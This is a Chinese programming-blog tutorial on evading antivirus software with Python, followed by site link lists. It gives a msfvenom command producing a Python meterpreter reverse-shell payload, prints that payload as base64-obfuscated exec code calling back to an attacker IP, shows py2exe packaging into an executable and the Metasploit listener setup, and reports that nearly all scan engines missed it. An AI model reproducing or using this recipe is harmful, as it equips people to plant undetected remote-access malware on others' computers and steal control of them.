编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

浅要分析Python程序与C程序的结合使用

Apr 07 Python

Python数据结构与算法之图的基本实现及迭代器实例详解

Dec 12 Python

Python中装饰器学习总结

Feb 10 Python

Flask-Mail用法实例分析

Jul 21 Python

Pycharm设置去除显示的波浪线方法

Oct 28 Python

Python从list类型、range()序列简单认识类(class)【可迭代】

May 31 Python

详解使用Python下载文件的几种方法

Oct 13 Python

jupyter 实现notebook中显示完整的行和列

Apr 09 Python

基于plt.title无法显示中文的快速解决

May 16 Python

python中通过pip安装库文件时出现“EnvironmentError: [WinError 5] 拒绝访问”的问题及解决方案

Aug 11 Python

python上下文管理的使用场景实例讲解

Mar 03 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

用php+mysql一个名片库程序

2006/10/09 PHP

PHP无刷新上传文件实现代码

2011/09/19 PHP

基于php上传图片重命名的6种解决方法的详细介绍

2013/04/28 PHP

基于php中使用excel的简单介绍

2013/08/02 PHP

PHP 中TP5 Request 请求对象的实例详解

2017/07/31 PHP

js简易namespace管理器实例代码

2013/06/21 Javascript

js setTimeout 参数传递使用介绍

2013/08/13 Javascript

LABjs、RequireJS、SeaJS的区别

2014/03/04 Javascript

JS中的form.submit()不能提交表单的错误原因

2014/10/08 Javascript

jquery滚动到顶部底部代码

2015/04/20 Javascript

javascript获取系统当前时间的方法

2015/11/19 Javascript

jstl中判断list中是否包含某个值的简单方法

2016/10/14 Javascript

分分钟玩转Vue.js组件（二）

2017/03/01 Javascript

Linux使用Node.js建立访问静态网页的服务实例详解

2017/03/21 Javascript

Cookies 和 Session的详解及区别

2017/04/21 Javascript

微信小程序url与token设置详解

2017/09/26 Javascript

Webpack中雪碧图插件使用详解

2018/05/25 Javascript

vue插件mescroll.js实现移动端上拉加载和下拉刷新

2019/03/07 Javascript

javascript实现画板功能

2020/04/12 Javascript

如何修改Vue打包后文件的接口地址配置的方法

2020/04/22 Javascript

浅析JavaScript 函数防抖和节流

2020/07/13 Javascript

Vue实现腾讯云点播视频上传功能的实现代码

2020/08/17 Javascript

[05:17]DOTA2誓师：今天我们在这里明天TI4等我！

2014/03/26 DOTA

python格式化字符串实例总结

2014/09/28 Python

python实时监控logstash日志代码

2020/04/27 Python

python实现二分类和多分类的ROC曲线教程

2020/06/15 Python

python pyg2plot的原理知识点总结

2021/02/28 Python

印度尼西亚最大的电商平台：Tokopedia（印尼版淘宝）

2017/12/02 全球购物

美国儿童珠宝在线零售商：Loveivy

2019/05/22 全球购物

实习生求职自荐信

2014/02/07 职场文书

教师产假请假条范文

2014/04/10 职场文书

记账会计岗位职责

2014/06/16 职场文书

国际贸易实训报告

2014/11/05 职场文书

趣味运动会简讯

2015/07/20 职场文书

积极心理学课程心得体会

2016/01/22 职场文书

MongoDB 常用的crud操作语句

2021/06/20 MongoDB